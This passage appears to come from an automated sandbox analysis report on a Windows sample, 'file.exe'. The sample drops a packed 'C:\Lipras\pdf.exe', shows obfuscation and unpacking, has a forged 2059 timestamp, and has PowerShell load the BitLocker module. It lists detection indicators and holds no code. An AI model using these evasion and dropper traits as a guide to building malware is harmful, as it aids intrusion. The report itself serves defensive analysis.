Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: webio.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Lipras\pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb source: file.exe
Source: Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdbnh source: file.exe

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Lipras\pdf.exe Unpacked PE file: 7.2.pdf.exe.30000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Binary contains a suspicious time stamp
Source: file.exe Static PE information: 0xA794DF11 [Tue Feb 4 02:31:45 2059 UTC]
PE file contains sections with non-standard names
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C66105 push eax; ret 2_2_04C66119
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08C67D78 pushfd ; iretd 2_2_08C67D79
Source: C:\Lipras\pdf.exe Code function: 7_2_000314CE push dword ptr [edx+eax-77h]; ret 7_2_000314D3
Source: C:\Lipras\pdf.exe Code function: 7_2_0004FEEB push ebx; ret 7_2_0004FEF6
Source: C:\Lipras\pdf.exe Code function: 7_2_0004FF0F push ebx; ret 7_2_0004FF13
Source: C:\Lipras\pdf.exe Code function: 7_2_026338DA push ecx; retf 7_2_026338DB
Source: pdf.exe.0.dr Static PE information: section name: entropy: 7.997714729230857
Source: pdf.exe.0.dr Static PE information: section name: entropy: 7.636228005076095
Source: pdf.exe.0.dr Static PE information: section name: entropy: 7.9278998086211505
Source: pdf.exe.0.dr Static PE information: section name: entropy: 7.978359432501147
Source: pdf.exe.0.dr Static PE information: section name: .data entropy: 7.985452413999655
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Lipras\pdf.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
